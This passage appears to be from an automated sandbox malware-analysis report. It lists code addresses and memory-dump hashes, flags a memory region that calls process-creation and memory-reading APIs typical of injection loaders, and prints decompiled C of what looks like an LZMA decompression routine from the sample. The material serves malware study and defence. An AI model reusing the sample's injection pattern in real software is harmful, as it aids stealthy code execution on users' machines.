                              0x00406a84
                              0x00406a87
                              0x00406a8b
                              0x00406a8e
                              0x00406a94
                              0x00406a96
                              0x00406a96
                              0x00406a96
                              0x00406a99
                              0x00406a9c
                              0x00406a9c
                              0x00406a9c
                              0x00406aa2
                              0x00000000
                              0x00000000
                              0x00406aa4
                              0x00406aa4
                              0x00406aa7
                              0x00406aaa
                              0x00406aad
                              0x00406ab0
                              0x00406ab3
                              0x00406ab6
                              0x00406ab9
                              0x00406abc
                              0x00406abf
                              0x00406ac2
                              0x00406ada
                              0x00406add
                              0x00406ae0
                              0x00406ae3
                              0x00406ae3
                              0x00406ae6
                              0x00406aea
                              0x00406aec
                              0x00406ac4
                              0x00406ac4
                              0x00406acc
                              0x00406ad1
                              0x00406ad3
                              0x00406ad5
                              0x00406ad5
                              0x00406aef
                              0x00406af6
                              0x00406af9
                              0x00000000
                              0x00406afb
                              0x00406afb
                              0x00000000
                              0x00406afb
                              0x00406af9
                              0x00406b00
                              0x00406b00
                              0x00406b00
                              0x00406b00
                              0x00000000
                              0x00000000
                              0x00406b3b
                              0x00406b3b
                              0x00406b3f
                              0x00407147
                              0x00407147
                              0x00000000
                              0x00407147
                              0x00406b45
                              0x00406b45
                              0x00406b48
                              0x00406b4b
                              0x00406b4f
                              0x00406b52
                              0x00406b58
                              0x00406b5a
                              0x00406b5a
                              0x00406b5a
                              0x00406b5d
                              0x00406b60
                              0x00406b60
                              0x00406b66
                              0x00406b04
                              0x00406b04
                              0x00406b07
                              0x00000000
                              0x00406b07
                              0x00406b68
                              0x00406b68
                              0x00406b6b
                              0x00406b6e
                              0x00406b71
                              0x00406b74
                              0x00406b77
                              0x00406b7a
                              0x00406b7d
                              0x00406b80
                              0x00406b83
                              0x00406b86
                              0x00406b9e
                              0x00406ba1
                              0x00406ba4
                              0x00406ba7
                              0x00406ba7
                              0x00406baa
                              0x00406bae
                              0x00406bb0
                              0x00406b88
                              0x00406b88
                              0x00406b90
                              0x00406b95
                              0x00406b97
                              0x00406b99
                              0x00406b99
                              0x00406bb3
                              0x00406bba
                              0x00406bbd
                              0x00000000
                              0x00406bbf
                              0x00406bbf
                              0x00000000
                              0x00406bbf
                              0x00000000
                              0x00406e4c
                              0x00406e4c
                              0x00406e50
                              0x00407177
                              0x00407177
                              0x00000000
                              0x00407177
                              0x00406e56
                              0x00406e56
                              0x00406e59
                              0x00406e5c
                              0x00406e60
                              0x00406e63
                              0x00406e69
                              0x00406e6b
                              0x00406e6b
                              0x00406e6b
                              0x00406e6e
                              0x00000000
                              0x00000000
                              0x00406c1c
                              0x00406c1c
                              0x00406c1f
                              0x00000000
                              0x00000000
                              0x00406f5b
                              0x00406f5b
                              0x00406f5f
                              0x00406f81
                              0x00406f81
                              0x00406f84
                              0x00406f8e
                              0x00406f91
                              0x00406f91
                              0x00000000
                              0x00406f91
                              0x00406f61
                              0x00406f61
                              0x00406f64
                              0x00406f68
                              0x00406f6b
                              0x00406f6b
                              0x00406f6e
                              0x00000000
                              0x00000000
                              0x00407018
                              0x00407018
                              0x0040701c
                              0x0040703a
                              0x0040703a
                              0x0040703a
                              0x0040703a
                              0x00407041
                              0x00407048
                              0x0040704f
                              0x0040704f
                              0x00407056
                              0x00407059
                              0x00407060
                              0x00000000
                              0x00407063
                              0x0040701e
                              0x0040701e
                              0x00407021
                              0x00407024
                              0x00407027
                              0x0040702e
                              0x00406f72
                              0x00406f72
                              0x00406f75
                              0x00000000
                              0x00000000
                              0x00407109
                              0x00407109
                              0x0040710c
                              0x0040700d
                              0x0040700d
                              0x0040700d
                              0x00000000
                              0x00407013
                              0x00000000
                              0x00406d43
                              0x00406d43
                              0x00406d45
                              0x00406d4c
                              0x00406d4d
                              0x00406d4f
                              0x00406d52
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00407056
                              0x00407056
                              0x00407059
                              0x00407060
                              0x00000000
                              0x00407063
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00406d88
                              0x00406d88
                              0x00406d8b
                              0x00406dc1
                              0x00406dc1
                              0x00406ef1
                              0x00406ef1
                              0x00406ef1
                              0x00406ef1
                              0x00406ef4
                              0x00406ef4
                              0x00406ef7
                              0x00406ef9
                              0x00407183
                              0x00407183
                              0x00000000
                              0x00407183
                              0x00406eff
                              0x00406eff
                              0x00406f02
                              0x00000000
                              0x00000000
                              0x00406f08
                              0x00406f08
                              0x00406f0c
                              0x00406f0f
                              0x00406f0f
                              0x00406f0f
                              0x00000000
                              0x00406f0f
                              0x00406d8d
                              0x00406d8d
                              0x00406d8f
                              0x00406d91
                              0x00406d93
                              0x00406d96
                              0x00406d97
                              0x00406d99
                              0x00406d9b
                              0x00406d9e
                              0x00406da1
                              0x00406db7
                              0x00406db7
                              0x00406dbc
                              0x00406df4
                              0x00406df4
                              0x00406df8
                              0x00406e21
                              0x00406e24
                              0x00406e26
                              0x00406e2d
                              0x00406e30
                              0x00406e33
                              0x00406e33
                              0x00406e38
                              0x00406e38
                              0x00406e3a
                              0x00406e3d
                              0x00406e44
                              0x00406e47
                              0x00406e74
                              0x00406e74
                              0x00406e77
                              0x00406e7a
                              0x00406eee
                              0x00406eee
                              0x00406eee
                              0x00406eee
                              0x00000000
                              0x00406eee
                              0x00406e7c
                              0x00406e7c
                              0x00406e82
                              0x00406e85
                              0x00406e88
                              0x00406e8b
                              0x00406e8e
                              0x00406e91
                              0x00406e94
                              0x00406e97
                              0x00406e9a
                              0x00406e9d
                              0x00406eb6
                              0x00406eb8
                              0x00406ebb
                              0x00406ebc
                              0x00406ebf
                              0x00406ec1
                              0x00406ec4
                              0x00406ec6
                              0x00406ec8
                              0x00406ecb
                              0x00406ecd
                              0x00406ed0
                              0x00406ed4
                              0x00406ed6
                              0x00406ed6
                              0x00406ed7
                              0x00406eda
                              0x00406edd
                              0x00406e9f
                              0x00406e9f
                              0x00406ea7
                              0x00406eac
                              0x00406eae
                              0x00406eb1
                              0x00406eb1
                              0x00406ee0
                              0x00406ee7
                              0x00406e71
                              0x00406e71
                              0x00406e71
                              0x00406e71
                              0x00000000
                              0x00406ee9
                              0x00406ee9
                              0x00000000
                              0x00406ee9
                              0x00406ee7
                              0x00406dfa
                              0x00406dfa
                              0x00406dfd
                              0x00406dff
                              0x00406e02
                              0x00406e05
                              0x00406e08
                              0x00406e0a
                              0x00406e0d
                              0x00406e10
                              0x00406e10
                              0x00406e13
                              0x00406e13
                              0x00406e16
                              0x00406e1d
                              0x00406df1
                              0x00406df1
                              0x00406df1
                              0x00406df1
                              0x00000000
                              0x00406e1f
                              0x00406e1f
                              0x00000000
                              0x00406e1f
                              0x00406e1d
                              0x00406da3
                              0x00406da3
                              0x00406da6
                              0x00406da8
                              0x00406dab
                              0x00000000
                              0x00000000
                              0x00406b0a
                              0x00406b0a
                              0x00406b0e
                              0x00407153
                              0x00407153
                              0x00000000
                              0x00407153
                              0x00406b14
                              0x00406b14
                              0x00406b17
                              0x00406b1a
                              0x00406b1d
                              0x00406b20
                              0x00406b23
                              0x00406b26
                              0x00406b28
                              0x00406b2b
                              0x00406b2e
                              0x00406b31
                              0x00406b33
                              0x00406b33
                              0x00406b33
                              0x00000000
                              0x00000000
                              0x00406c95
                              0x00406c95
                              0x00406c99
                              0x0040715f
                              0x0040715f
                              0x00000000
                              0x0040715f
                              0x00406c9f
                              0x00406c9f
                              0x00406ca2
                              0x00406ca5
                              0x00406ca8
                              0x00406caa
                              0x00406caa
                              0x00406caa
                              0x00406cad
                              0x00406cb0
                              0x00406cb3
                              0x00406cb6
                              0x00406cb9
                              0x00406cbc
                              0x00406cbd
                              0x00406cbf
                              0x00406cbf
                              0x00406cbf
                              0x00406cc2
                              0x00406cc5
                              0x00406cc8
                              0x00406ccb
                              0x00406ccb
                              0x00406ccb
                              0x00406cce
                              0x00406cd0
                              0x00406cd0
                              0x00000000
                              0x00000000
                              0x00406f12
                              0x00406f12
                              0x00406f12
                              0x00406f16
                              0x00000000
                              0x00000000
                              0x00406f1c
                              0x00406f1c
                              0x00406f1f
                              0x00406f22
                              0x00406f25
                              0x00406f27
                              0x00406f27
                              0x00406f27
                              0x00406f2a
                              0x00406f2d
                              0x00406f30
                              0x00406f33
                              0x00406f36
                              0x00406f39
                              0x00406f3a
                              0x00406f3c
                              0x00406f3c
                              0x00406f3c
                              0x00406f3f
                              0x00406f42
                              0x00406f45
                              0x00406f48
                              0x00406f4b
                              0x00406f4f
                              0x00406f51
                              0x00406f54
                              0x00000000
                              0x00406f56
                              0x00406f56
                              0x00406cd3
                              0x00406cd3
                              0x00000000
                              0x00406cd3
                              0x00406f54
                              0x00407189
                              0x00407189
                              0x00000000
                              0x00000000
                              0x004067b8
                              0x004071c0
                              0x004071c0
                              0x00000000
                              0x004071c0
                              0x0040700d
                              0x0040708d
                              0x00407056

                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8cc43af0f3dc7360b650843029f4fb37e98cf8e44e9d3f0eb3b9d5ec05d02dde
                              • Instruction ID: 56db4e79aaf5e8580c905796a14d264bc3fb4972df64c765fca97ee639103a5c
                              • Opcode Fuzzy Hash: 8cc43af0f3dc7360b650843029f4fb37e98cf8e44e9d3f0eb3b9d5ec05d02dde
                              • Instruction Fuzzy Hash: 87A15531E04229CBDF28CFA8C8446ADBBB1FF44305F14812ED856BB281C7786A86DF45
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateProcessW.KERNEL32(?,00000000), ref: 003D058C
                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 003D05D3
                              • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 003D08ED
                              Memory Dump Source
                              • Source File: 00000004.00000002.2162147549.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                              Similarity
                              • API ID: Process$CreateMemoryReadTerminate
                              • String ID:
                              • API String ID: 2831168122-0
                              • Opcode ID: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
                              • Instruction ID: 28fdc297be09978ea29c1673aedc2cca57ed6d510e15fc3ba040acdeb84b6557
                              • Opcode Fuzzy Hash: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
                              • Instruction Fuzzy Hash: 16525E36E50258EEEB65CB94EC55BFDB7B5AF48B00F204496E608FA2A0D3705E80DF05
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 98%
                              			E00406F5B() {
                              				void _t533;
                              				signed int _t534;
                              				signed int _t535;
                              				signed int* _t605;
                              				void* _t612;
                              
                              				L0:
                              				while(1) {
                              					L0:
                              					if( *(_t612 - 0x40) != 0) {
                              						 *(_t612 - 0x84) = 0x13;
                              						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                              						goto L132;
                              					} else {
                              						__eax =  *(__ebp - 0x4c);
                              						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                              						__ecx =  *(__ebp - 0x58);
                              						__eax =  *(__ebp - 0x4c) << 4;
                              						__eax =  *(__ebp - 0x58) + __eax + 4;
                              						L130:
                              						 *(__ebp - 0x58) = __eax;
                              						 *(__ebp - 0x40) = 3;
                              						L144:
                              						 *(__ebp - 0x7c) = 0x14;
                              						L145:
                              						__eax =  *(__ebp - 0x40);
                              						 *(__ebp - 0x50) = 1;
                              						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                              						L149:
                              						if( *(__ebp - 0x48) <= 0) {
                              							__ecx =  *(__ebp - 0x40);
                              							__ebx =  *(__ebp - 0x50);
                              							0 = 1;
                              							__eax = 1 << __cl;
                              							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                              							__eax =  *(__ebp - 0x7c);
                              							 *(__ebp - 0x44) = __ebx;
                              							while(1) {
                              								L140:
                              								 *(_t612 - 0x88) = _t533;
                              								while(1) {
                              									L1:
                              									_t534 =  *(_t612 - 0x88);
                              									if(_t534 > 0x1c) {
                              										break;
                              									}
                              									switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
                              										case 0:
                              											if( *(_t612 - 0x6c) == 0) {
                              												goto L170;
                              											}
                              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                              											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                              											_t534 =  *( *(_t612 - 0x70));
                              											if(_t534 > 0xe1) {
                              												goto L171;
                              											}
                              											_t538 = _t534 & 0x000000ff;
                              											_push(0x2d);
                              											asm("cdq");
                              											_pop(_t569);
                              											_push(9);
                              											_pop(_t570);
                              											_t608 = _t538 / _t569;
                              											_t540 = _t538 % _t569 & 0x000000ff;
                              											asm("cdq");
                              											_t603 = _t540 % _t570 & 0x000000ff;
                              											 *(_t612 - 0x3c) = _t603;
                              											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                              											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                              											_t611 = (0x300 << _t603 + _t608) + 0x736;
                              											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                              												L10:
                              												if(_t611 == 0) {
                              													L12:
                              													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                              													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                              													goto L15;
                              												} else {
                              													goto L11;
                              												}
                              												do {
                              													L11:
                              													_t611 = _t611 - 1;
                              													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400; // each 16-bit probability starts at 0x400, half of the 0x800 model total
                              												} while (_t611 != 0);
                              												goto L12;
                              											}
                              											if( *(_t612 - 4) != 0) {
                              												GlobalFree( *(_t612 - 4));
                              											}
                              											_t534 = GlobalAlloc(0x40, 0x600); // executed
                              											 *(_t612 - 4) = _t534;
                              											if(_t534 == 0) {
                              												goto L171;
                              											} else {
                              												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                              												goto L10;
                              											}
                              										case 1:
                              											L13:
                              											__eflags =  *(_t612 - 0x6c);
                              											if( *(_t612 - 0x6c) == 0) {
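                              												 *(_t612 - 0x88) = 1; // input count [ebp-0x6c] is zero: record the current state in the dispatch variable before leaving via L170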
                              												goto L170;
                              											}
                              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                              											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                              											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                              											_t45 = _t612 - 0x48;
                              											 *_t45 =  *(_t612 - 0x48) + 1;
                              											__eflags =  *_t45;
                              											L15:
                              											if( *(_t612 - 0x48) < 4) {
                              												goto L13;
                              											}
                              											_t546 =  *(_t612 - 0x40);
                              											if(_t546 ==  *(_t612 - 0x74)) {
                              												L20:
                              												 *(_t612 - 0x48) = 5;
                              												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                              												goto L23;
                              											}
                              											 *(_t612 - 0x74) = _t546;
                              											if( *(_t612 - 8) != 0) {
                              												GlobalFree( *(_t612 - 8));
                              											}
                              											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                              											 *(_t612 - 8) = _t534;
                              											if(_t534 == 0) {
                              												goto L171;
                              											} else {
                              												goto L20;
                              											}
                              										case 2:
                              											L24:
                              											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                              											 *(_t612 - 0x84) = 6;
                              											 *(_t612 - 0x4c) = _t553;
                              											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                              											goto L132;
                              										case 3:
                              											L21:
                              											__eflags =  *(_t612 - 0x6c);
                              											if( *(_t612 - 0x6c) == 0) {
                              												 *(_t612 - 0x88) = 3;
                              												goto L170;
                              											}
                              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                              											_t67 = _t612 - 0x70;
                              											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                              											__eflags =  *_t67;
                              											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                              											L23:
                              											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                              											if( *(_t612 - 0x48) != 0) {
                              												goto L21;
                              											}
                              											goto L24;
                              										case 4:
                              											L133:
                              											_t531 =  *_t605;
                              											_t588 = _t531 & 0x0000ffff;
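                              											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588; // range-coder bound = ([ebp-0x10] >> 11) * 16-bit probability; compared against the value in [ebp-0xc]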
                              											if( *(_t612 - 0xc) >= _t564) {
                              												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                              												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                              												 *(_t612 - 0x40) = 1;
                              												_t532 = _t531 - (_t531 >> 5);
                              												__eflags = _t532;
                              												 *_t605 = _t532;
                              											} else {
                              												 *(_t612 - 0x10) = _t564;
                              												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                              												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                              											}
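                              											if( *(_t612 - 0x10) >= 0x1000000) { // [ebp-0x10] still >= 2^24: skip case 5, which shifts both values left by 8 and reads one more input byte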
                              												goto L139;
                              											} else {
                              												goto L137;
                              											}
                              										case 5:
                              											L137:
                              											if( *(_t612 - 0x6c) == 0) {
                              												 *(_t612 - 0x88) = 5;
                              												goto L170;
                              											}
                              											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                              											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                              											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                              											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                              											L139:
                              											_t533 =  *(_t612 - 0x84);
                              											goto L140;
                              										case 6:
                              											__edx = 0;
                              											__eflags =  *(__ebp - 0x40);
                              											if( *(__ebp - 0x40) != 0) {
                              												__eax =  *(__ebp - 4);
                              												__ecx =  *(__ebp - 0x38);
                              												 *(__ebp - 0x34) = 1;
                              												 *(__ebp - 0x84) = 7;
                              												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                              												goto L132;
                              											}
                              											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                              											__esi =  *(__ebp - 0x60);
                              											__cl = 8;
                              											__cl = 8 -  *(__ebp - 0x3c);
                              											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                              											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                              											__ecx =  *(__ebp - 0x3c);
                              											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                              											__ecx =  *(__ebp - 4);
                              											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                              											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                              											__eflags =  *(__ebp - 0x38) - 4;
                              											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                              											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                              											if( *(__ebp - 0x38) >= 4) {
                              												__eflags =  *(__ebp - 0x38) - 0xa;
                              												if( *(__ebp - 0x38) >= 0xa) {
                              													_t98 = __ebp - 0x38;
                              													 *_t98 =  *(__ebp - 0x38) - 6;
                              													__eflags =  *_t98;
                              												} else {
                              													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                              												}
                              											} else {
                              												 *(__ebp - 0x38) = 0;
                              											}
                              											__eflags =  *(__ebp - 0x34) - __edx;
                              											if( *(__ebp - 0x34) == __edx) {
                              												__ebx = 0;
                              												__ebx = 1;
                              												goto L61;
                              											} else {
                              												__eax =  *(__ebp - 0x14);
                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                              												__eflags = __eax -  *(__ebp - 0x74);
                              												if(__eax >=  *(__ebp - 0x74)) {
                              													__eax = __eax +  *(__ebp - 0x74);
                              													__eflags = __eax;
                              												}
                              												__ecx =  *(__ebp - 8);
                              												__ebx = 0;
                              												__ebx = 1;
                              												__al =  *((intOrPtr*)(__eax + __ecx));
                              												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                              												goto L41;
                              											}
                              										case 7:
                              											__eflags =  *(__ebp - 0x40) - 1;
                              											if( *(__ebp - 0x40) != 1) {
                              												__eax =  *(__ebp - 0x24);
                              												 *(__ebp - 0x80) = 0x16;
                              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                              												__eax =  *(__ebp - 0x28);
                              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                              												__eax =  *(__ebp - 0x2c);
                              												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                              												__eax = 0;
                              												__eflags =  *(__ebp - 0x38) - 7;
                              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                              												__al = __al & 0x000000fd;
                              												__eax = (__eflags >= 0) - 1 + 0xa;
                              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                              												__eax =  *(__ebp - 4);
                              												__eax =  *(__ebp - 4) + 0x664;
                              												__eflags = __eax;
                              												 *(__ebp - 0x58) = __eax;
                              												goto L69;
                              											}
                              											__eax =  *(__ebp - 4);
                              											__ecx =  *(__ebp - 0x38);
                              											 *(__ebp - 0x84) = 8;
                              											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                              											goto L132;
                              										case 8:
                              											__eflags =  *(__ebp - 0x40);
                              											if( *(__ebp - 0x40) != 0) {
                              												__eax =  *(__ebp - 4);
                              												__ecx =  *(__ebp - 0x38);
                              												 *(__ebp - 0x84) = 0xa;
                              												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                              											} else {
                              												__eax =  *(__ebp - 0x38);
                              												__ecx =  *(__ebp - 4);
                              												__eax =  *(__ebp - 0x38) + 0xf;
                              												 *(__ebp - 0x84) = 9;
                              												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                              												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                              											}
                              											goto L132;
                              										case 9:
                              											__eflags =  *(__ebp - 0x40);
                              											if( *(__ebp - 0x40) != 0) {
                              												goto L90;
                              											}
                              											__eflags =  *(__ebp - 0x60);
                              											if( *(__ebp - 0x60) == 0) {
                              												goto L171;
                              											}
                              											__eax = 0;
                              											__eflags =  *(__ebp - 0x38) - 7;
                              											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                              											__eflags = _t259;
                              											0 | _t259 = _t259 + _t259 + 9;
                              											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                              											goto L76;
                              										case 0xa:
                              											__eflags =  *(__ebp - 0x40);
                              											if( *(__ebp - 0x40) != 0) {
                              												__eax =  *(__ebp - 4);
                              												__ecx =  *(__ebp - 0x38);
                              												 *(__ebp - 0x84) = 0xb;
                              												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                              												goto L132;
                              											}
                              											__eax =  *(__ebp - 0x28);
                              											goto L89;
                              										case 0xb:
                              											__eflags =  *(__ebp - 0x40);
                              											if( *(__ebp - 0x40) != 0) {
                              												__ecx =  *(__ebp - 0x24);
                              												__eax =  *(__ebp - 0x20);
                              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                              											} else {
                              												__eax =  *(__ebp - 0x24);
                              											}
                              											__ecx =  *(__ebp - 0x28);
                              											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                              											L89:
                              											__ecx =  *(__ebp - 0x2c);
                              											 *(__ebp - 0x2c) = __eax;
                              											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                              											L90:
                              											__eax =  *(__ebp - 4);
                              											 *(__ebp - 0x80) = 0x15;
                              											__eax =  *(__ebp - 4) + 0xa68;
                              											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                              											goto L69;
                              										case 0xc:
                              											L100:
                              											__eflags =  *(__ebp - 0x6c);
                              											if( *(__ebp - 0x6c) == 0) {
                              												 *(__ebp - 0x88) = 0xc;
                              												goto L170;
                              											}
                              											__ecx =  *(__ebp - 0x70);
                              											__eax =  *(__ebp - 0xc);
                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											_t335 = __ebp - 0x70;
                              											 *_t335 =  *(__ebp - 0x70) + 1;
                              											__eflags =  *_t335;
                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											__eax =  *(__ebp - 0x2c);
                              											goto L102;
                              										case 0xd:
                              											L37:
                              											__eflags =  *(__ebp - 0x6c);
                              											if( *(__ebp - 0x6c) == 0) {
                              												 *(__ebp - 0x88) = 0xd;
                              												goto L170;
                              											}
                              											__ecx =  *(__ebp - 0x70);
                              											__eax =  *(__ebp - 0xc);
                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											_t122 = __ebp - 0x70;
                              											 *_t122 =  *(__ebp - 0x70) + 1;
                              											__eflags =  *_t122;
                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              											L39:
                              											__eax =  *(__ebp - 0x40);
                              											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                              											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                              												goto L48;
                              											}
                              											__eflags = __ebx - 0x100;
                              											if(__ebx >= 0x100) {
                              												goto L54;
                              											}
                              											L41:
                              											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                              											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                              											__ecx =  *(__ebp - 0x58);
                              											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                              											 *(__ebp - 0x48) = __eax;
                              											__eax = __eax + 1;
                              											__eax = __eax << 8;
                              											__eax = __eax + __ebx;
                              											__esi =  *(__ebp - 0x58) + __eax * 2;
                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                              											__ax =  *__esi;
                              											 *(__ebp - 0x54) = __esi;
                              											__edx = __ax & 0x0000ffff;
                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                              											__eflags =  *(__ebp - 0xc) - __ecx;
                              											if( *(__ebp - 0xc) >= __ecx) {
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              												__cx = __ax;
                              												 *(__ebp - 0x40) = 1;
                              												__cx = __ax >> 5;
                              												__eflags = __eax;
                              												__ebx = __ebx + __ebx + 1;
                              												 *__esi = __ax;
                              											} else {
                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                              												 *(__ebp - 0x10) = __ecx;
                              												0x800 = 0x800 - __edx;
                              												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                              												__ebx = __ebx + __ebx;
                              												 *__esi = __cx;
                              											}
                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                              											 *(__ebp - 0x44) = __ebx;
                              											if( *(__ebp - 0x10) >= 0x1000000) {
                              												goto L39;
                              											} else {
                              												goto L37;
                              											}
